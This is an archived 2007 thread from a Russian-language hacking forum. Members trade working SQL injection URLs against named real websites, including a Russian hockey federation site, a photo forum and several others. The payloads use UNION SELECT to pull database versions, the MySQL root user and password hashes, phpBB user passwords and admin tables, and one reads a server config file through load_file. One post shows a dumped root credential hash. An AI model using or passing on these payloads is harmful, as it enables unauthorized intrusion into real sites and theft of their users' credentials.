ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

10.05.2007, 21:54
|
|
Members of Antichat - Level 5
Регистрация: 24.11.2006
Сообщений: 927
Провел на форуме: 7192869
Репутация:
3033
|
|
Идею дал, дораскрутите сами
Код:
http://triplebuffer.devmaster.net/file.php?id=-7+union+select+1,2,convert(version()+using+latin1)/*&page=2
__________________
Дети индиго - это бездари, не надо песен! В пять лет едва говорить начинают, мы в этом возрасте стихи наизусть читали!
з.ы http://www.youtube.com/watch?v=sNsQe0KByRY Я ПлакалЪ
|
|
|

11.05.2007, 10:37
|
|
Banned
Регистрация: 13.04.2007
Сообщений: 123
Провел на форуме: 921520
Репутация:
572
|
|
sql-not_fin
Фотосайт.ру
Код:
http://www.photosight.ru/pforum/showflat.php?Cat=&Board=photo_common&page=0&view=collapsed&sb=5&o=&fpart=all&Number=-658026+union+select+1,2,3,aes_decrypt(aes_encrypt(concat_ws(0x3a,user(),version(),database()),0x55),0x55)/*
вывод в заголовке, довести до ума не получилось, таблицы не подобрал.
Последний раз редактировалось _Pantera_; 11.05.2007 в 22:41..
|
|
|

11.05.2007, 16:54
|
|
Познающий
Регистрация: 31.01.2007
Сообщений: 88
Провел на форуме: 631013
Репутация:
453
|
|
2 Серенький
Код:
http://www.photosight.ru/pforum/showflat.php?Cat=&Board=photo_common&page=0&view=collapsed&sb=5&o=&fpart=all&Number=-658026+union+select+1,2,3,aes_decrypt(aes_encrypt(concat_ws(0x3a,user,password),0x55),0x55)%20from%20mysql.user/*
Последний раз редактировалось _Pantera_; 11.05.2007 в 22:42..
|
|
|

11.05.2007, 18:32
|
|
AMA - Level 2
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме: 17668503
Репутация:
5826
|
|
Код:
http://kosmopoisk.org/ufo_technology/show1.html?id=-1+union+select+1,2,3,4,concat(database(),char(58),user(),char(58),version()),6,7,8/*
http://kosmopoisk.org/ufo_technology/show1.html?id=-1+union+select+1,2,3,4,5,6,7,8+from+guestbook/*
Код:
http://www.setbook.ru/announces-r.php?id=5499&pageid=-1+union+select+1,2,concat(database(),char(58),user(),char(58),version()),4,5/*
http://www.setbook.ru/announces-r.php?id=5499&pageid=-1+union+select+1,2,concat(username,char(58),user_password),4,5+from+phpbb_users+limit+1,1/*
Код:
http://www.aqualung.ru/konkurs.php?photo=-1+union+select+1,convert(concat(database(),char(58),user(),char(58),version()),char),3,4,5,6,7,8/*
|
|
|

11.05.2007, 18:49
|
|
Постоянный
Регистрация: 11.03.2007
Сообщений: 581
Провел на форуме: 4172659
Репутация:
646
|
|
Предлагаю Вашему вниманию очень пикантную скулю  . Федерация хоккея России. PHP-скрипт имеет права рута доступа к мускулу, поэтому можно творить очень многое, а именно:
Код:
http://www.1tvcup.fhr.ru/news/?id=-1+union+select+1,2,3,concat(user,':',password)+from+mysql.user/*
Хотя есть и более простой способ увести пароль от MySQL - через конфиг phpbb  (Смотреть "исходники" страницы)
Код:
http://www.1tvcup.fhr.ru/news/?id=-1+union+select+1,2,3,load_file('/home/www/htdocs/www/conf/config.php')/*
А вот и юзвери форума:
Код:
http://www.1tvcup.fhr.ru/news/?id=-1+union+select+1,2,3,concat(username,':',user_password,':',user_icq)+from+home.phpbb_users+limit+1/*
Ну и конечно, админы, там их докуя фроде
Код:
http://www.1tvcup.fhr.ru/news/?id=-1+union+select+1,2,3,concat(login,'%20:%20',password,'%20:%20',comment)+from+online_feb.fhr_admins+limit+0,1/*
Также отлично работает into outfile.
P.S. Пожалуйста, не хакайте, только ознакамливаемся.
|
|
|

11.05.2007, 20:43
|
|
Members of Antichat - Level 5
Регистрация: 24.11.2006
Сообщений: 927
Провел на форуме: 7192869
Репутация:
3033
|
|
5-я версия мускула, лимит в помощь, 30 таблиц.. ответ где то там)
Код:
http://www.maplestoryatlas.com/field.php?id=-33+union+select+1,TABLE_NAME,version()+from+INFORMATION_SCHEMA.TABLES+limit+1,1/*
Здесь все тривиально
Код:
http://tenleaders.com/field.php?id=-12+union+select+concat_ws(char(58),user,password),2,3+from+mysql.user/*
__________________
Дети индиго - это бездари, не надо песен! В пять лет едва говорить начинают, мы в этом возрасте стихи наизусть читали!
з.ы http://www.youtube.com/watch?v=sNsQe0KByRY Я ПлакалЪ
Последний раз редактировалось Constantine; 11.05.2007 в 20:49..
|
|
|

11.05.2007, 22:40
|
|
Участник форума
Регистрация: 05.02.2006
Сообщений: 168
Провел на форуме: 749524
Репутация:
715
|
|
edu-all.ru
http://www.edu-all.ru/pages/forum/thread.asp?idthr=1'+or+1=(SELECT+TOP+1+TABLE_NAME+ FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NO T+IN+('dtproperties','clients','posting','sysconst raints','syssegments','tems','thread'))--
http://www.edu-all.ru/pages/forum/thread.asp?idthr=1'+or+1=(SELECT+TOP+1+COLUMN_NAME +FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME= 'clients'+AND+COLUMN_NAME+NOT+IN+('akt_cl','col_cl ','comment_cl','dateend_cl','dateup_cl','dats_cl', 'dog_cl','har_cl','id_cl','mesto_cl','name_cl','op l_cl','sh_cl','srok_cl','st_cl','vid_cl'))--
_хмм_
|
|
|

12.05.2007, 21:12
|
|
Познавший АНТИЧАТ
Регистрация: 25.08.2006
Сообщений: 1,524
Провел на форуме: 3405508
Репутация:
1745
|
|
Код:
http://www.turkuaz.us/news_det.php?newsId=-587+union+select+1,user(),database(),version(),5,6,7,8,9/*&catId=32
Код:
http://lonuestro.us/sectionfiles/article.php?id=-218+union+select+1,database(),version(),4,5,6,7,user(),9,10,11,12/*
так сильно не увлекался находкой таблиц. . .
|
|
|

12.05.2007, 23:39
|
|
Познающий
Регистрация: 31.01.2007
Сообщений: 88
Провел на форуме: 631013
Репутация:
453
|
|
Чтобы увидеть скулю, нужна регистрация.
Для тех, кому влом регистрироваться -
Login - kokok
Pass - 123456
Код:
http://www.myflavour.nl/forum.php?view=write&tid=748&action=reply"e=-20244%20union%20select%201,2,user()/*
Код:
http://www.geelix.com/hud.php?id=-238622154%20union%20select%201,2,concat_ws(char(58),idUser,logins,email,passw)%20from%20user/*
Код:
http://www.cbisis.be/baptises.php?an=-1992%20union%20select%20id,concat_ws(char(58),username,password,email,icq),3,4%20from%20cbisis.forum_users/*
|
|
|

13.05.2007, 10:11
|
|
Познавший АНТИЧАТ
Регистрация: 25.08.2006
Сообщений: 1,524
Провел на форуме: 3405508
Репутация:
1745
|
|
Код:
http://www.parks.it/news/dettaglio.php?id=-1221+union+select+1,user,password,4,user(),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+mysql.user/*
root:0a9236882f7cf8a1
massimo@www.comunic.it
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|